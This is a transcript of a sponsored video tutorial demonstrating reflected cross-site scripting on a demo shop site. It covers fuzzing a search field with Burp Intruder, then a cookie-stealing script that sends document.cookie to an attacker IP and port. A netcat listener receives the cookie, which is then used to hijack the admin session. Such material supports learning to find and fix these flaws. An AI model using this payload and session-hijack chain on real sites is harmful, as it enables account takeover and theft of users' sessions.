This video is sponsored by RoboFarm. The biggest question of all is, can we get hacked if we clicked onto a link? Well, the answer is yes, you can. Just by clicking onto a link, if the site is vulnerable to what we call a cross-site scripting attack, once you click the link, that's it. It's game over. And I'll show you even a piece of code that you can use very quickly to test your site to look out for vulnerabilities and how hackers could easily send those credentials over into their hacking server, after which being able to mirror your entire session, meaning that they have taken over all of your login, all of your accounts. Let's take a quick pause and have a word from our sponsor. Hi, Mr. Hackalong. Is there a way for us to secure our passwords easily? Yes, let me introduce to you an awesome password manager, RoboFarm. RoboFarm securely stores all of your passwords and logs you in with a single click or tap, save time entering personal and billing information with autofill for long web forms. RoboFarm is available for Windows, Mac, iOS, and Android with support for all of the respective major browsers, including Microsoft Edge. RoboFarm's random password generator will create a strong and unique password for each site. Say goodbye to using weak duplicate passwords for everything. Look at the amazing reviews on RoboFarm to help secure your passwords. And in fact, click the sign up link right now. And yes, you must absolutely smash the like button, because if you don't, I'm not sure what would happen to you. And turn on notification to the subscription to this channel. So right in front of us, we have a typical looking e-commerce site, which is showcasing all the products, and they have a search bar. And of course, you can sign in and sign up for an account into the website. So let's go ahead and click sign in or sign up to the website. And of course, I can enter, say, the username. All right, so in this case, I'll enter admin, and I'll enter the password here. So let's go ahead and enter a password and click sign in. So once we click so, we are brought into the account page. And I can go to the top right corner. I can click under my profile. And in this case, you can see the following right here. We have username admin and the email of admin@hackathon.com. So we can easily search for any products we want. So in this case, say I enter MBA, and we can see a return of a product. And at the same time, I can change this search into, say, 1. I can change it over into 2. And one thing you notice is under the URL part where we can enter the information. Anytime you were to change this up, you see that the search string equal to. All right, so it will equal into the value that you enter. So if I was to enter, say, shampoo, all right, and I enter hello, whatever the case is, we can see the following string being changed up, which is shampoo plus hello. So this is the part where we'll be testing for vulnerabilities to target against the site, and a couple of ways for us to do just that. So the first way that I'm teaching you to do this is to go to the top right corner of Foxy Proxy, click under Burp Suite. All right, so we have our interceptor, and I can go ahead and open up terminal. All right, so once I open up terminal, what I can do here is enter Burp Suite. Okay, and we can run this as our interceptor. So this is the place where we want to test out for possible vulnerabilities. So we click Start Burp. So we have the community edition running here. And what we can do now is we can go over to the proxy and ensure the intercept is on. So once intercept is on, you go back to the browser. You once again, in this case, I can enter, or I say MBA. I click search. I got an interception right here. So this is the place, this is the part where we are changing up certain values, we're changing up certain information, or test different parts of the site for vulnerabilities. So I can do a right click. I can send over to intruder, and you see the intruder blinking right here. So go ahead and click on that. And we have positions. Okay, so I can go ahead and say clear the ID. So we are targeting, in this case, the search string for cross-site scripting vulnerabilities. So go ahead and clear this, and as well as clearing for the PHP session ID and visited product. So let's go ahead and clear just that. So once you've cleared it, go over to Payloads and click under Load. So this is the place where we'll be testing out for all these vulnerabilities. And you can see under /usr share wfuzz word list injections. Okay, and you see the following, which is XSS.txt. So all this are the cross-site scripting payloads that we can inject over the site to see which one return us the value to be able to inject the site and look out for those vulnerabilities. So once you're ready, in 3, 2, 1, click Start Attack. And you can see right here, the community edition contains a demo version of Burp Intruder. Click OK on this. And we can see the following. All right, we got a status, and we want to flag out which one of it is producing a value for us so that we know for sure that it is vulnerable. So I can go to the top left corner, I can click attack and pause. So what we can do now is I can do a right click into any of this payload and I can click request in browser. I click in original session. I copy the following information. I go back to the browser. I open a new tab. I paste and I hit enter on this. And you can see the pop-up showing us this particular payload is injecting right and doing a pop-up as we can see right here. So this entry is vulnerable and susceptible to the cross-site scripting attack. So what we can do next is, now that we have verified the vulnerability of it, we can begin crafting out more advanced ways of identifying certain values within the cross-site script that we are entering. So in this case, I can enter the following, okay, script, I can enter alert, and what I want to do is document.cookie and see whether we are able to flag out the current PHP session ID within the browser. So I can go ahead and click search. And you can see right here, we got the following PHP session ID and visited underscore products. So we are able to extract the PHP session ID. And with this session ID, we'll be able to log in to this user using a completely different browser just by updating the values of the cookie. So what we can do now is to start up a hacking server so that we can pick up all of these requests that are coming in into our site. So what I can do here is I can go ahead and enter NC, all right, which is netcat, and VLP followed by port 4444. Hit enter on this. So we're listening now on port 4444 so that we can send the request over into the hacker server. Now jumping back over into the browser, I'll turn off Foxy Proxy, okay, and what I can do now is to craft a more specific type of attack method. So in this case, what I can do is I can enter the following, which is script, and I have the following here, okay, so I have the image, all right, dot source, okay, so you can see right here, script, new image dot source, and then we're targeting into the Kali Linux or the hacker's IP address. So in this case, we have 192.168.0.192, port 4444, and then we can enter whatever we want. So in this case, I'll put hacker.php, and then we have an output into document.cookie. All right, so this will then send the information over into the hacker's server. Okay, so what I can do now is I can go ahead and enter search. And you can see right here, we have the following information. Okay, so this is the link that we can send to any user. And once they click onto the link, that's it. It's game over. We'll have full, complete control of the session ID. You don't believe what I'm telling you? Well, let me show you exactly how that works. Now, jumping back to the demonstration, I can go back over into terminal. I can see the following output here. Get hacker.php output PHP session ID. So this is the value that's been received by the hacker. So I can do a right click, I do a copy selection, I open up a completely different type of browser. So in this case, I have Google Chrome, and you can see right here, okay, I zoom in a little more so it's easier for you to see, we're not signing in at all. Okay, so what I can do is I can go to the top right corner, I can go ahead and click under more tools. I click under, say, developable tools. In this case, I can go over the cookies. Okay, so what I can do now is I can change up the PHP session ID. I paste it right here. I hit enter on this. Okay, and all I got to do now is just go back to the site, do a refresh, okay, with the new PHP session ID that I've received. And you can see right here, your account. I click under my profile and we are in. That's it. It's game over. Admin at HackerZone. So there are two types of cross-site scripting attack, and what I've demonstrated to you earlier is what we call a reflected cross-site scripting attack, meaning that we can send a link, drop a link to the user, and once they clicked on it, we'll be able to take up some of this data or even do any kind of redirection or literally anything you want, because the site is vulnerable to cross-site scripting attacks where you can inject your own script into the site. I would say that you've definitely learned something valuable in today's session. And of course, we'll cover about stored cross-site scripting attacks in the future. So definitely you want to turn notifications so that when that comes up, you get notified. And happy hacking.